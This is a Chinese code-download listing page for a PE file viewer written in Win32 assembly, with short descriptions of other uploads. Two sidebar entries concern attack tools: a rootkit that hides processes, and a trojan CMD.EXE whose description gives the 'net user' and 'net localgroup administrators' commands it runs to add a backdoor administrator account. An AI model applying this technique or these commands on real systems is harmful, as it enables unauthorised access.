登录
首页 » Network Security » PE文件信息查看工具,Win32ASM源码PE Labs 1.0源码

PE文件信息查看工具,Win32ASM源码PE Labs 1.0源码

于 2023-06-10 发布 文件大小:44.97 kB
0 183
下载积分: 2 下载次数: 1

代码说明:

PE文件信息查看工具,Win32ASM源码PE Labs 1.0源码-PE File Information See tools, Win32ASM source PE Labs 1.0 source

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • 遍历C盘所有文件的例子
    遍历C盘所有文件的例子-traverse all documents examples
    2022-09-17 23:50:03下载
    积分:1
  • 基于winpcap 用于udp 数据包的捕获。用c++编写。
    基于winpcap 用于udp 数据包的捕获。用c++编写。-the program is about capturing udp datasets
    2022-02-07 12:28:00下载
    积分:1
  • rootkit工具,可以隐藏进程和驱动
    rootkit工具,可以隐藏进程和驱动-rootkit tool to hide processes and drive
    2023-05-02 06:40:04下载
    积分:1
  • a compact to the telnet program
    一个给小巧的telnet程序-a compact to the telnet program
    2022-05-06 04:42:56下载
    积分:1
  • 该程序是关于tcp数据包的捕获。
    基于winpcap 对tcp 数据包的捕获。用c++编写。-the program is about capturing tcp datas.
    2022-02-02 07:17:10下载
    积分:1
  • 小程系,大家可以看看啊,C程序中的汉字显示
    小程系,大家可以看看啊,C程序中的汉字显示-small way line, we can look at the ah, C procedures for the Chinese character display
    2023-01-09 03:40:03下载
    积分:1
  • 基于无线网络管理的交互式门禁系统,门禁系统在当今的安防产品中有着重要的地位,随着社会的进步,越来越多的地方使用门禁系统,并且对门禁的可靠性和交互性有着更高的要求...
    基于无线网络管理的交互式门禁系统,门禁系统在当今的安防产品中有着重要的地位,随着社会的进步,越来越多的地方使用门禁系统,并且对门禁的可靠性和交互性有着更高的要求,本系统就是从这些方面考虑,将门禁设备与用户终端相连,做到人员识别的准确性和信息采集的实时处理。-Based on wireless network management, interactive access control systems, access control systems in today" s security products, has an important position, as society advances, more and more places to use access control system, and the reliability of access and interactivity will have a more higher requirements, the system is from these considerations, access control equipment and user terminals will be connected, so that the accuracy of personal identification and information gathering real-time processing.
    2022-07-22 20:49:01下载
    积分:1
  • 2022-03-07 11:04:02下载
    积分:1
  • Similarity
    基于相似度聚类分析的异常入侵检测系统模型与实现
    2022-12-18 17:00:03下载
    积分:1
  • 你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100...
    你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级-cmd loopholes in the source code
    2022-06-01 08:01:12下载
    积分:1
  • 696524资源总数
  • 103945会员总数
  • 46今日下载